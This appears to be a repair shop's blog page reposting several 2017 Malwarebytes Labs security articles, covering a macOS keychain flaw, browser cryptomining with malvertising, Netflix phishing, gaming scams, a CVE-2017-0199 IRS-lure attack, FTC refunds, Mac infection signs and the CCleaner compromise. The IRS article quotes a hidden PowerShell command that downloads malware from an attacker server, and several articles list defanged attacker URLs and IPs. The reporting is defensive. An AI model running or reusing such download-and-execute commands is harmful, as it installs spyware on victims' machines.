Sep 26, 2017
John
Comments Off on Keychain vulnerability in macOS

Keychain vulnerability in macOS

On Monday, Patrick Wardle, a respected security researcher at Synack and owner of Objective-See, sent a tweet about a keychain vulnerability he had found in macOS High Sierra. As his tweet showed, it is possible for a malicious app to extract, and then exfiltrate, keychain data from High Sierra, with passwords clearly exposed in plain text.

In response to some questions, Wardle has also posted some additional information in an FAQ on Patreon.

This announcement set off a firestorm of articles on a variety of sites, which unfortunately caused a lot of FUD (fear, uncertainty, and doubt). In at least one case, I saw an article saying to hold off on installing High Sierra until this bug is fixed. It seems that many of these articles were written based solely on the contents of that tweet, but there is much more to be said.

It’s important to understand that the idea that people should wait to install High Sierra because of this bug is a very bad one, for multiple reasons.

First, as Wardle points out in his FAQ, this bug also affects Sierra and probably affects El Capitan as well. For all we know, it may go back further than that… only testing older systems can say for sure. So, you’ve probably got the vulnerability already anyway, whether you upgrade to High Sierra or not.

Second, installing updates and upgrades is an extremely important thing to do to keep yourself secure. If you don’t update, you don’t get important security fixes. If you skip upgrading to High Sierra because of one vulnerability (which you’re already vulnerable to anyway), that may mean that you will continue to be vulnerable to other issues that may have been fixed in High Sierra, but not in Sierra.

Keep in mind that the Mac fix for the extremely serious Broadpwn vulnerability was, apparently, only applied to macOS Sierra 10.12.6. So the old common knowledge that Mac security fixes go into the last three systems (El Capitan, Sierra, and High Sierra) does not seem to still be true, if it ever really was.

Third, let’s pretend for a moment that this was a vulnerability only affecting High Sierra. If you skip High Sierra, that implies that you think doing so makes you safe from keychain theft. Think again.

Consider, for example, the issue described in a blog post by Brenton Henry, in which a combination of an Apple tool and an AppleScript could be used to extract the contents of the keychain. That issue exists on older systems, but not Sierra or High Sierra.

Not only is the issue described by Henry a vulnerability that still exists on older systems, it’s a known vulnerability. That means that any script kiddie capable of doing a Google search would be able to implement it; it’s not that hard to do. Nobody knows yet how the vulnerability found by Wardle works, only that it exists.

As another example, think about the compromise of the HandBrake app in May, which led to systems being infected with the Proton malware. In that case, Proton was able to successfully trick the user into providing their password, and then exfiltrated that and their keychain files (among other things), which could be unlocked using that same password in most cases.

There was also the case of an interesting sample of the Dok malware one of our researchers received in a junk e-mail, which used an open-source Python remote access tool (RAT) that had the capability to exfiltrate the keychain and convincingly phish a user’s password.

These last two examples would work on any system, including High Sierra since they involve theft of both the user’s password and the keychain files.

Don’t get me wrong, this is a very bad vulnerability, and Apple should fix it as soon as possible. However, it’s not a world-ending catastrophe, nor is it a good reason to avoid installing High Sierra. There will always be vulnerabilities. Keeping your system and your software up-to-date is one of the best ways you can cope with them.

The post Keychain vulnerability in macOS appeared first on Malwarebytes Labs.

Powered by WPeMatico

Sep 25, 2017
John
Comments Off on Drive-by mining and ads: The Wild Wild West

Drive-by mining and ads: The Wild Wild West

There seems to be a trend lately for publishers to monetize their traffic by having their visitors mine for cryptocurrencies while on their site. The idea is that you are accessing content for free and in exchange, your computer (its CPU in particular) will be used for mining purposes.

The Pirate Bay started to run a miner on its site and later publicly acknowledged it. In other cases, the mining was a byproduct of malicious adverts or done via legitimate but compromised websites that are being injected with cryptomining code directly.

Needless to say, this practice is raising many eyebrows and not everyone is on the same page about whether this new business model could be a long-term replacement for ads (although most people agree that ads are often annoying and malicious).

But what exactly happens when publishers turn your PC into a miner and display ads at the same time? In this post, we take a look at what is arguably a bad mix.

Drive-by mining

Because mining happens in the browser via JavaScript without user interaction, we could compare it to drive-by downloads. As publishers need to retain the visitor’s attention so that the JavaScript code runs uninterrupted for as long as possible, this is where the type of content matters. We know that for example gaming or video streaming sites tend to keep people on their page much longer than others.

Figure 1: A streaming site that is (not so) silently mining cryptocurrency

There is one exception here, in that in some cases, loading the JavaScript mining code once is enough, no matter whether the user decides to change site afterward, the mining will continue. This particular abuse technique affects Internet Explorer (i.e. the zombie script) and was identified and reported (but not fixed yet) by Manuel Caballero.

This concept of mining digital currency via the browser is a little odd at first because it is well known how resource intensive mining can be, requiring powerful machines loaded with expensive hardware. While this is true for Bitcoin, it is not for other currencies that were designed for ordinary CPUs.

Take the Monero digital currency, powered by the CryptoNight algorithm, which can be mined with a standard CPU with little difference in overall results compared to running more advanced hardware. This literally opens the door to a large and still mostly untapped market comprised of millions of typical consumer machines.

Coinhive advertises itself as “A Crypto Miner for your Website” and enables website owners to quickly set up mining by using their JavaScript API. Without a doubt, it has gained very rapid adoption but unfortunately is already being abused.

Figure 2: JavaScript API/code from Coinhive on the client side used to mine cryptocurrency

Gaming and video sites typically are more resource intensive, so it seems to make little sense to run a miner at the same time without having a noted impact. Having said that, many people who consume copyrighted content are perhaps less likely to complain about an under par user experience.

The question at this point is: How far can publishers push the limits towards a really bad user experience? You may be surprised that for many, this is not really a problem at all and that double dipping is, in fact, a fairly common practice.

Forced mining and malvertising

The same site pictured above was not only monetizing via Coinhive, but they also ran adverts. Clicking anywhere on the page – including the ‘Play’ button on the video – triggered a pop under advert that ran through various ad exchanges and resulted in malvertising in almost all instances, leading to tech support scams and several different exploit kit infection chains.

Tech support scams

Tech support scams are one of the most common redirections we see these days. While they do not usually infect your computer, they are still a threat to consider. The most common symptom is referred to as ‘Browlock’ because scammers use code that prevents you from normally closing your browser. The claims are always excessive and designed to scare users about made up infections. Victims that call the posted number for help end up with more computer issues and several hundreds of dollars less in their wallet.

Figure 3: Malvertising leading to tech support scam (Browlock) is triggered when clicking anywhere on the page

Figure 4: Web traffic showing redirection sequence from publisher to tech support scam page

RIG exploit kit

RIG is the most popular exploit kit these days and malvertising is its prime delivery mechanism. Victims are filtered using the same tools that marketers have to profile consumers, and there can be a secondary level of filtering, usually via a gate that performs geolocation checks for example.

Figure 5: RIG EK via malvertising chain

Terror exploit kit

Terror EK is on a much smaller distribution scale than RIG but is still a fairly active exploit kit that tries out different things. For instance, some Terror EK infection chains use SSL encryption (via free certificates from Let’s Encrypt). It also has an interesting gate with one of the most convoluted iframe encodings we have seen.

Figure 6: Terror EK via malvertising, and gate before landing page

Block less or more?

One of the first reactions to the rise of browser cryptominers was to ask how to block them, whether with a typical ad blocker or URL/IP blacklist and even by disabling JavaScript. There’s no question that users are annoyed by a rollout that did not include their opinion, even though many were actually favorable to this alternate solution to online ads.

While cryptominers do have an impact on system resources, there was at least a sense that they may be safer and less intrusive than ads. But publishers ought to be more transparent with their audience because no-one likes unannounced guests. Unfortunately, there will always be publishers that care very little about what kind of traffic they push, so long as it generates good revenues; for those, cryptominers are just an added income to their existing advertising portfolio.

Malwarebytes users are already protected against this drive-by mining. In fact, we are blocking over 5 million connection attempts to Coinhive every single day, which shows that browser-based mining has really taken off in a big way.

Our goal is to protect people from unsolicited drive-by cryptomining. However, for those users that are aware and want to participate in mining, they can absolutely do so by adding an exclusion for this domain.

Indicators of compromise

Tech support scam

192.241.220[.]40/877microsoft/

RIG EK

Fobos: hudsonentertainment[.]info/
Fobos: 204hdchdhhh[.]cf/tako/?re=6128546021
RIG IP: 188.225.83[.]85
43bc543d26f755474b355a70c25077df8ab71836056619216792a112a79bcd3d

Terror EK

onpakfucli.salary-radar[.]bid/search-w3kpShD3axxD/R5ALkH3JyPBC/rzcp4YrhDgzu.html
wabusfqdty.salary-radar[.]bid/search-w3kpShD3axxD/iqW1OavoNisD.php
4fccf7246b6807e22c42dd93507592cca0594694f4487b03db04ef13e7a99c54

The post Drive-by mining and ads: The Wild Wild West appeared first on Malwarebytes Labs.

Powered by WPeMatico

Sep 25, 2017
John
Comments Off on A week in security (September 18 – September 24)

A week in security (September 18 – September 24)

Last week, we kept you updated on our blog about the infected versions of CCleaner that were offered as downloads on the official servers.

We also warned you against a fake IRS notice that delivers a customized spying tool, some of the threats currently facing gamers, and a Netflix scam that has been doing the rounds in Europe.

Mac users learned how to tell if their Mac is infected and Advanced Tech Support victims learned how to apply for a (partial) refund.

Elsewhere:

Consumer news

Business news

 

Stay safe!

Malwarebytes Labs Team

The post A week in security (September 18 – September 24) appeared first on Malwarebytes Labs.

Powered by WPeMatico

Sep 22, 2017
John
Comments Off on Netflix scam warning

Netflix scam warning

Always be on your toes

While we are used to receiving scam attempts pretending to be from banks, online shops, credit card companies, and international courier services that does not mean all the other emails are safe. Far from it. To demonstrate this point we will show you a scam aimed at Netflix customers which has been used in the Netherlands and is now doing the rounds in the UK but could just as easily spread to the US.

The mail in question

The sender address, in this case, was supportnetflix@checkinformation[.]com and the content of the email informs us that there has been a problem with our last payment. Obviously to those of us who are not customers of Netflix this is the first red flag. The fact that the domain name checkinformation[.]com does not belong to Netflix is another big red flag. In fact, the domain is for sale at the moment of writing.

phishing mail

Netflix

Account disabled!

Dear User,

We’re having some trouble with your current billing information. We’ll try again. But in the meantime you may want to update your payment details. During the next login process, you will be required to provide some informations like (billing info, phone number, payment info)

 

So the email asks us to fill out our payment details on a site. This should always be a red flag for everyone. A security-aware company does not provide you with a clickable button to their site. They will tell you to log into their site and provide you with instructions on how to proceed. They will not provide a direct link to a page with a form to fill out asking for billing information and what not.

Pay attention to

When you have to provide such details always look for the green padlock in the address bar of your browser.

green padlock

Remember that the green padlock is not the sole condition, but it is a must before you proceed.

Another telltale sign is spelling errors, but again, the lack of them is not a definite green light to proceed. Scammers have learned that their efficiency goes up if they pay attention to their spelling.

Also never judge a site by its looks, because phishers are masters in the art of copying the layout and images from legitimate sites. In fact, they usually link to the actual layout and images of the website they are pretending to be.

Links

The Guardian: Watch out for Netflix email scam that looks like the real deal

In January another Netflix scam was analyzed by FireEye.

Guideline to help determine whether a website is legitimate.

 

Pieter Arntz

The post Netflix scam warning appeared first on Malwarebytes Labs.

Powered by WPeMatico

Sep 21, 2017
John
Comments Off on Don’t let these gaming threats give you a Game Over

Don’t let these gaming threats give you a Game Over

With EGX, the biggest gaming event in the UK opening its doors today, we thought it’d be timely to remind you of some of the threats currently facing gamers. No matter what type of game, client, or system you use, there’s always something waiting to try and give you a bad day where the safety of your account is concerned.

GTAV cash generators

Some games, like GTAV, involve an amount of “grinding” (performing potentially repetitive tasks) to get what you want. In this case, incredibly expensive items/additional content which are free to download, but cost in-game money to make use of. In GTAV, you can buy in-game currency with real money to speed up the process, grind, or turn to the internet in search of free money tools. While modders in game sessions can – and do – spawn money from the sky, or only add cash to your account, the huge pile of YouTube videos and web comments claiming to offer free services online are all fake. The so-called money generators are merely survey scams, which lead to requests for personal information or downloadable files (which may or may not be malicious).

GTAV

gta fake

Steam scams

These are very popular, especially with accounts being able to buy and sell (expensive) digital items for various titles, adding extra desirability to scammers wanting to make a quick buck. Phishing is a mainstay of Steam scams; other attacks, such as swiping a Steam SSFN file to bypass Steam Guard are much more sophisticated. Be wary of fake item trades, especially if they don’t lead to an official Steam URL – you may well be looking at a static phishing page, or one which scrapes some elements from the real thing to appear legitimate.

steam uploader


Read: Something’s phishy: How to detect phishing attempts


Swatting

The act of sending armed law enforcement round to a game streamer’s house, which could potentially be fatal. Streamers usually get caught by this by being too open with their personal information – quite often, you’ll find out all you need to know about your target simply by listening to them stream. Before you know it, they’ll have casually mentioned locations, even nearby streets where their friends live, and much more besides. Calls to said friends pretending to be someone else, for example, will fill in the missing pieces of the puzzle.

Ironically, the main way to avoid swatting (for the most part) is to tell people who make a living out of talking, to stop talking about themselves (just a little bit). This is no guarantee of safety; many other ways exist to obtain a home address via publicly available information. All in all, Streaming is a bit of a dangerous past-time.

Game company hacks

There’s not a huge amount you can do when the gatekeepers of your data get popped, but that doesn’t mean you should be complacent. Many game companies and hardware makers now offer additional forms of security such as key fobs and two-factor authentication, which you should make use of whenever possible. You may also wish to use a password manager to ensure you’re not just reusing the same passwords everywhere, which could lead to additional compromises. Modern gaming can require multiple passwords across different gaming platforms just to play one game, so it’s fairly common to see video game password burnout – don’t fall for it!

Fake emulators

It’s becoming increasingly difficult to obtain old game consoles, much less play the original titles. Even on consoles where backwards compatibility exists, titles differ from how they were originally, or licensed music has been replaced, or the control scheme is different, or maybe it works on this console but not that mobile properly, and anyway its funded by ads, and so on.

Entering stage left: fake emulators. It is still challenging to emulate most of the last generation (or two) of consoles, and you should be extremely wary where such claims are concerned.

fake emulator

These are some of the most common problems we see on a daily basis in gaming land; feel free to offer up some of the scams you’ve seen doing the rounds in the comments below. Safe gaming!

 

The Malwarebytes Labs Team

The post Don’t let these gaming threats give you a Game Over appeared first on Malwarebytes Labs.

Powered by WPeMatico

Sep 21, 2017
John
Comments Off on Fake IRS notice delivers customized spying tool

Fake IRS notice delivers customized spying tool

While macro-based documents and scripts make up for the majority of malspam attacks these days, we also see some campaigns that leverage documents embedded with exploits. Case in point, we came across a malicious Microsoft Office file disguised as a CP2000 notice. The Internal Revenue Service (IRS) usually mails out this letter to taxpayers when information is incorrectly reported on a previous return.

Victims that fall for the scam will infect themselves with a custom Remote Administration Tool. A RAT can be utilized for legitimate purposes, for example by a system administrator, but it can also be used without a user’s consent or knowledge to remotely control their machine, view and delete files or deploy a keylogger to silently capture keystrokes.

In this blog post, we will review this exploit’s delivery mechanism and take a look at the remote tool it deploys.

Distribution

The malicious document is hosted on a remote server and users are most likely enticed to open it via a link from a phishing email. The file contains an OLE2 embedded link object which retrieves a malicious HTA script from a remote server and executes it. In turn, it downloads the final payload, all with very little user interaction required since it is using CVE-2017-0199, first uncovered in April 2017 as a zero-day.

82.211.30[.]108/css/CP2000IRS.doc

The embedded link points to an HTA script hosted under an unexpected location – a Norwegian company’s compromised FTP server – which invokes PowerShell to download and execute the actual malware payload.

ftp://lindrupmartinsen[.]no:21/httpdocs/test/template.hta

"C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" 
-WindowStyle Hidden (New-Object System.Net.WebClient)
.DownloadFile('http://82.211.30[.]108/css/intelgfx.exe',
'C:Users[username]AppDataRoaming62962.exe');

Payload

The downloaded payload (intelgfx.exe) extracts to several components into a local folder and achieves persistence using a decoy shortcut. The VBS scripts ensure that the main module runs without showing its GUI, in order to remain invisible to the victim.

RMS agent stands for Remote Manipulator System and is a remote control application made by a Russian company. It appears that in this case, the attackers took the original program (as pictured below) and slightly customized it, not to mention the fact that they are using it for nefarious purposes, namely spying on their victims.

Its source code shows the debugging path information and name that they gave to the module.

Office exploits and RATs

This is not the first time that CVE-2017-0199 is used to distribute a RAT. Last August, TrendMicro described an attack where the same exploit was adapted for PowerPoint and used to deliver the REMCOS RAT. It also shows that threat actors often repackage existing toolkits – which can be legitimate – and turn them into full-fledged spying applications.

We reported the compromised FTP server to its owner. Malwarebytes users were already protected against CVE-2017-0199 as well as its payload which is detected as Backdoor.Bot.

Thanks to @hasherezade for help with payload analysis.

Indicators of compromise

Word doc CVE-2017-0199

82.211.30[.]108/css/CP2000IRS.doc
47ee31f74b6063fab028111e2be6b3c2ddab91d48a98523982e845f9356979c1

HTA script

ftp://lindrupmartinsen[.]no:21/httpdocs/test/template.hta
d01b6d9507429df065b9b823e763a043aa38b722419d35f29a587c893b3008a5

Main package (intelgfx.exe)

82.211.30[.]108/css/intelgfx.exe
924aa03c953201f303e47ddc4825b86abb142edb6c5f82f53205b6c0c61d82c8

RAT module

4d0e5ebb4d64adc651608ff4ce335e86631b0d93392fe1e701007ae6187b7186

Other IOCs from same distribution server

82.211.30[.]108/estate.xml
82.211.30[.]108/css/qbks.exe

The post Fake IRS notice delivers customized spying tool appeared first on Malwarebytes Labs.

Powered by WPeMatico

Sep 20, 2017
John
Comments Off on FTC providing partial refunds for Advanced Tech Support victims

FTC providing partial refunds for Advanced Tech Support victims

Last month, the FTC announced the recovery of 10 million dollars from Advanced Tech Support, one of the most successful US-based tech support scammers ever. This money will be put towards partial refunds for victims of ATS who purchased products or services from them between April 2012 and November 2014. Per the FTC announcement, the deadline for a refund is October 27. To repeat:

The deadline for a refund application is October 27.

Restitution from Advanced Tech Support is notable because most scams based in the United States structure their finances such that only a small core of founders ever see a significant profit. These founders then tend to spend most of their money on extravagant parties, vacations, and other ostentatious displays of wealth – leaving very little to recover. Due to these factors, it’s noteworthy that the FTC was able to recover any significant amount of money at all.

Advanced Tech Support, otherwise known as Inbound Call Experts, has had a lengthy history with Florida law enforcement and the FTC. Check out their case history here, where you can follow the long road it took to bring this company to justice.  And remember:

The deadline for a refund application is October 27.

The post FTC providing partial refunds for Advanced Tech Support victims appeared first on Malwarebytes Labs.

Powered by WPeMatico

Sep 20, 2017
John
Comments Off on How to tell if your Mac is infected

How to tell if your Mac is infected

There are a lot of reasons Mac users don’t sweat getting infected. One: They’ve got a built-in anti-malware system called XProtect that does a decent job of catching known malware. Two: Macs are not plagued by a high number of attacks. (Most cybercriminals are focused on infecting PCs.) And three: There’s just not a lot of Mac malware out there.

But that’s changing, and fast: Mac malware has increased by 230 percent in the last year alone. Most Mac users don’t know this, and assume their Mac is fine. For those folks we have one word: adware.

Your Mac is infected…with adware

Adware is software that’s designed to display advertisements, usually within a web browser. Most people don’t willingly download programs whose sole purpose is to bombard you with ads, so adware has to sneak its way onto your Mac. It either disguises itself as legitimate or piggybacks on another program in order to be installed.

Once in your system, adware changes the way your browser behaves by injecting ads into web pages, causing pop-up windows or tabs to open, and changing your homepage or search engine—all in the name of funneling advertising dollars away from companies who pay for online ads and into their own accounts.

Your Mac is infected…and not protected

Sounds pretty shady, right? So why doesn’t the Mac anti-malware program catch these guys? Typically, the makers of adware are hiding in plain sight, operating as actual corporations who claim to sell software on the level. They get away with it because their adware is often hidden in the fine print of a long installation agreement that most people skip over. Is it technically legal? Yes. You accepted the terms of the installment so they can spam you all they want. But is it right? So far, Apple hasn’t stepped in to crack down on it. But if you ask us, the answer is an emphatic “no.”

In addition to adware, other potentially unwanted programs, such as so-called “legitimate” keyloggers, scammy “cleaning” apps, and faux antivirus programs that don’t actually detect anything are skirting the Mac protections in place. (Because XProtect doesn’t detect and block adware or potentially unwanted programs—only malware that it has seen before.) So if a new form of malware makes its way onto your computer before Apple has a chance to learn about it and write code to protect against it, then you’re out of luck.

So if you ask us, it’s time to start taking a closer look at your Mac. Is it acting the way your sturdy, reliable Mac has always behaved? Or is it exhibiting classic signs of guilt? If something seems a little off, you just might have a problem. Let’s take a look at the telltale signs that your Mac is infected.

Signs of adware

Advertisements are displayed in places they shouldn’t be, literally popping up everywhere. Your web browser’s homepage has been mysteriously changed without your permission. Web pages that you typically visit are not displaying properly, and when you click on a website link, you get redirected to an entirely different site. In fact, even your search engine has been replaced with a different one. If your web browser, search engine, or websites are acting in funky, unpleasant ways, you’ve likely got yourself an adware infection.

Signs of PUPs

Maybe you downloaded a new program to monitor your family’s behavior online. All of a sudden, new icons are appearing on your desktop for software you don’t remember installing. New toolbars, extensions, or plugins are added to your browser. A pop-up appears telling you your Mac may be infected, and you need to install the latest antivirus immediately to get rid of it. Frightened, you do so, and now your computer has turned the corner from automatically installing apps to slowing to a crawl. What’s going on? These are PUPs, and your Mac’s anti-malware system is not going to get rid of them.

Signs of malware

Mac malware making its way onto your system is, right now, relatively rare. But if it does, you may look out for similar behavior as an infected Windows operating system: your computer’s processing power seems diminished, software programs are sluggish, your browser redirects or is unresponsive, or your ole-reliable starts crashing regularly.

In some cases, you may not be aware of an infection at all. While your computer hums along, info stealers operate quietly in the background, stealing your data for an attack on your bank accounts or identity.

And in the worst case scenario, your Mac can even be infected with ransomware. In March 2016, the first Mac ransomware was spotted, and it was downloaded by thousands of users before Apple had a chance to shut it down. A ransomware attack would be quite obvious to Mac users. Files would be encrypted and cybercriminals would deliver a ransom demand (usually via pop-up) in order to return your data.

Do any of these scenarios sound familiar to you? If so, there are a few steps you can take to remedy the infection. First, back up your files. Next, download a (legitimate) anti-malware program such as Malwarebytes for Mac that’s designed to search and destroy adware, PUPs, and any new forms of malware lurking on the scene. Run a scan and, if there are any nasties hiding away in your pristine Mac OS, it’ll bag, tag, and dump them for you. Then you can finally get your Mac back.

The post How to tell if your Mac is infected appeared first on Malwarebytes Labs.

Powered by WPeMatico

Sep 20, 2017
John
Comments Off on A week in security (September 11 – September 17)

A week in security (September 11 – September 17)

Last week, we dug into phishing campaigns done via Linkedin accounts, remediation versus prevention, issues with smart syringe pumps, and advised you to go patch against a Word 0day. We had some tips regarding identity theft protection, explored crowdsourced fraud, and explained YARA rules.

Elsewhere:

Consumer News

Stay safe!

Malwarebytes Labs Team

The post A week in security (September 11 – September 17) appeared first on Malwarebytes Labs.

Powered by WPeMatico

Sep 20, 2017
John
Comments Off on [Updated] Infected CCleaner downloads from official servers

[Updated] Infected CCleaner downloads from official servers

Update (9/19/2017):

Avast posted a clarification explaining what happened and giving a timeline of the events. One point we should take note of is that the breach preceded the take-over of Piriform by Avast.

Users that are unsure whether they were affected by this and whether their data may have been sent to the C2 server can check for the presence of the following values under the registry key:

HKEY_LOCAL_MACHINESOFTWAREPiriformAgomo

The values in question are:
MUID, TCID and NID

These values are not created by any clean versions of CCleaner, just by the infected ones.

Malwarebytes will detect the presence of those values and flag them as Trojan.Floxif.Trace

The trojan itself reportedly only ran on Windows 32 bit systems, but the values above were created on 64 bit systems as well.

Original post:

In a supply chain attack that may be unprecedented in the number of downloads, servers hosting CCleaner, a popular tool for cleaning up the PC, has been delivering a version of the said software with malware.

What happened?

Threat actors have managed to change the files that were being delivered by Avast servers hosting CCleaner updates. In case you are wondering why they were on those servers, Avast acquired Piriform, the original publishers of CCleaner, a few months ago.

The incident was discovered and reported by Talos. Piriform is aware of the situation and is acting to prevent further damage. They are also investigating how the files coming from their servers were modified before being released to the public.

compromised version

Possible impact

It is difficult to say at this moment how many users might have been affected, but the numbers could be huge. From the statistics brought out by Piriform, CCleaner has been downloaded 2 billion times in total, 5 million times every week. The modified version, 5.33, is made available from August 15 until September 12 when version 5.34 was released. In a press statement the company estimates that 2.27 million people used the affected software.

The malware

The malware collects the following information about the infected system:

  • Computer name
  • A list of installed software, including Windows updates
  • A list of the currently running processes
  • The MAC addresses of the first three network adapters
  • Other system information that is relevant for the malware like admin privileges, whether it is a 64-bit system, etc.

The malware uses a hardcoded C2 server and a domain generating algorithm (DGA) as a backup, to send information about the affected system and fetch the final payload.

blocked IP

What to do if you think you are affected?

First of all, check the version of CCleaner on your system. If you suspect you may have downloaded CCleaner version 5.33.6162 or CCleaner Cloud version 1.07.3191, scan your system for malware.

Detection and Protection

 

CCleaner users that are running older versions or that do not trust the one they are using now are encouraged to update their CCleaner software to version 5.34 or higher. The latest version is available for download here.

Affected versions: CCleaner version 5.33.6162 and CCleaner Cloud version 1.07.3191

Malwarebytes blocks the IP and domains related to this malware. We also remove the malicious installer.

Stay safe!

 

Pieter Arntz

The post [Updated] Infected CCleaner downloads from official servers appeared first on Malwarebytes Labs.

Powered by WPeMatico

Pages:«123456»

Location and hours

1-401-366-2249
Txt/Email or CALL NOW to discuss your recovery plan.
Computer repair association logo